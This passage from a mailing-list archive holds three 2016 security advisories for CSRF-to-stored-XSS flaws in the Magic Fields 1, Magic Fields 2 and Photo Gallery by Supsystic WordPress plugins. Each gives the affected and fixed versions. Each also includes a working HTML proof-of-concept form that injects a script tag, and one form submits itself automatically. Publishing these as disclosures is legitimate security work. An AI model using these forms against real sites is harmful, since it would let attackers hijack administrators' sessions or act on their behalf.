------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The Magic Fields plugin lacks a CSRF (nonce) token on the request of
adding a magic field. The description field of custom fields lacks
output encoding which could result in malicious script inserted by an
attacker and executed in the browser.

You need to lure a logged-in admin to follow a malicious link containing
the poc below. 

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The proof of concept below injects script code in the "description"
field when adding a new custom field.

<html>
	<body>
		<form
action="http://build.wordpress-develop.dev/wp-admin/admin.php?page=MagicFieldsMenu&custom-write-panel-id=1&mf_action=finish-create-custom-field"
method="POST">
			<input type="hidden" name="custom&#45;group&#45;id" value="1" />
			<input type="hidden" name="custom&#45;field&#45;name"
value="asd222asd" />
			<input type="hidden" name="custom&#45;field&#45;description"
value="as22da2&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
			<input type="hidden" name="custom&#45;field&#45;duplicate" value=""
/>
			<input type="hidden" name="custom&#45;field&#45;order" value="0" />
			<input type="hidden" name="custom&#45;field&#45;required" value="0"
/>
			<input type="hidden" name="custom&#45;field&#45;type" value="1" />
			<input type="hidden" name="custom&#45;field&#45;helptext" value="" />
			<input type="hidden" name="custom&#45;field&#45;css"
value="magicfields" />
			<input type="hidden" name="custom&#45;field&#45;size" value="25" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>[h3]References[/h3]
[1]
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_magic_fields_1_wordpress_plugin.html
[2] http://magicfields.org/
[3] https://github.com/hunk/Magic-Fields#172
------------------------------------------------------------------------
Persistent Cross-Site Scripting in Magic Fields 2 WordPress Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Magic Fields 2
plugin. This issue allows an attacker to perform a wide variety of
actions, such as stealing Administrators' session tokens, or performing
arbitrary actions on their behalf. In order to exploit this issue, the
attacker has to lure/force a logged on WordPress Administrator into
opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0017

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Magic Fields 2 [2] version
2.3.2.4.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is fixed in version 2.3.3 [3]

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The Magic Fields plugin lacks a CSRF (nonce) token on the request of
adding a magic field. The magic field lacks output encoding which could
result in malicious script inserted by an attacker.

You need to lure a logged-in admin to follow a malicious link containing
the poc below.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The proof of concept below injects script code in the "Login Required
Message" in the settings page.

<html>
	<body>
		<form
action="http://build.wordpress-develop.dev/wp-admin/admin.php?page=mf_dispatcher&init=true&mf_section=mf_custom_fields&mf_action=save_custom_field"
method="POST">
			<input type="hidden" name="mf&#95;field&#91;core&#93;&#91;id&#93;"
value="" />
			<input type="hidden"
name="mf&#95;field&#91;core&#93;&#91;post&#95;type&#93;" value="page" />
			<input type="hidden"
name="mf&#95;field&#91;core&#93;&#91;custom&#95;group&#95;id&#93;"
value="" />
			<input type="hidden" name="mf&#95;field&#91;core&#93;&#91;label&#93;"
value="foo&quot;&gt;&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;"
/>
			<input type="hidden" name="mf&#95;field&#91;core&#93;&#91;name&#93;"
value="foo" />
			<input type="hidden"
name="mf&#95;field&#91;core&#93;&#91;description&#93;" value="asdasdasd"
/>
			<input type="hidden" name="mf&#95;field&#91;core&#93;&#91;type&#93;"
value="audio" />
			<input type="hidden"
name="mf&#95;field&#91;core&#93;&#91;required&#95;field&#93;" value="0"
/>
			<input type="hidden"
name="mf&#95;field&#91;core&#93;&#91;duplicate&#93;" value="0" />
			<input type="hidden" name="submit" value="Save&#32;Custom&#32;Field"
/>
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_magic_fields_2_wordpress_plugin.html
[2] http://magicfields.org/
[3] https://github.com/magic-fields-team/Magic-Fields-2#233
------------------------------------------------------------------------
Stored Cross-Site Scripting vulnerability in Photo Gallery WordPress
Plugin
------------------------------------------------------------------------
Umit Aksu, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Photo Gallery by
Supsystic WordPress Plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160722-0004

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Photo Gallery by Supsystic [2]
WordPress Plugin version 1.8.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Photo Gallery by Supsystic version 1.8.6 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Photo Gallery by Supsystic [2] WordPress Plugin can be used to
create portfolios and image galleries. A Cross-Site Scripting
vulnerability was found in the Photo Gallery by Supsystic WordPress
Plugin. This issue allows an attacker to perform a wide variety of
actions, such as stealing users' session tokens, or performing arbitrary
actions on their behalf. In order to exploit this issue, the attacker
has to lure/force a victim into opening a malicious website/link.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
It is possible to deliver a Cross-Site Scripting attack through
Cross-Site Request Forgery. The caption text in the gallery is
vulnerable to a stored Cross-Site Scripting. The Cross-Site Scripting
attack is normaly only exploitable if the attacker has admin privileges.
However, no measures are implemented to protect against Cross-Site
Request Forgery on the request that saves the image details. Due to
this, it is possible to exploit this issue via Cross-Site Request
Forgery.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form method="post" action="http://<target>/wp-admin/admin-ajax.php">
			<input type="hidden" name="caption" value='this is the
caption"><script>alert("Fromfff CSRF to XSS!");</script>'>
			<input type="hidden" name="captionEffect" value="quarter-slide-up">
			<input type="hidden" name="description" value="">
			<input type="hidden" name="alt" value="Capture">
			<input type="hidden" name="link" value="">
			<input type="hidden" name="cropPosition" value="center-center">
			<input type="hidden" name="replace_attachment_id" value="">
			<input type="hidden" name="image_id" value="13">
			<input type="hidden" name="attachment_id" value="10">
			<input type="hidden" name="gallery_id" value="6">
			<input type="hidden" name="action" value="grid-gallery">
			<input type="hidden" name="route[module]" value="photos">
			<input type="hidden" name="route[action]" value="updateAttachment">
		</form>
		<script>
			document.forms[0].submit();
		</script>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_photo_gallery_wordpress_plugin.html
[2] https://wordpress.org/plugins/gallery-by-supsystic/
[3] https://downloads.wordpress.org/plugin/gallery-by-supsystic.zip

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ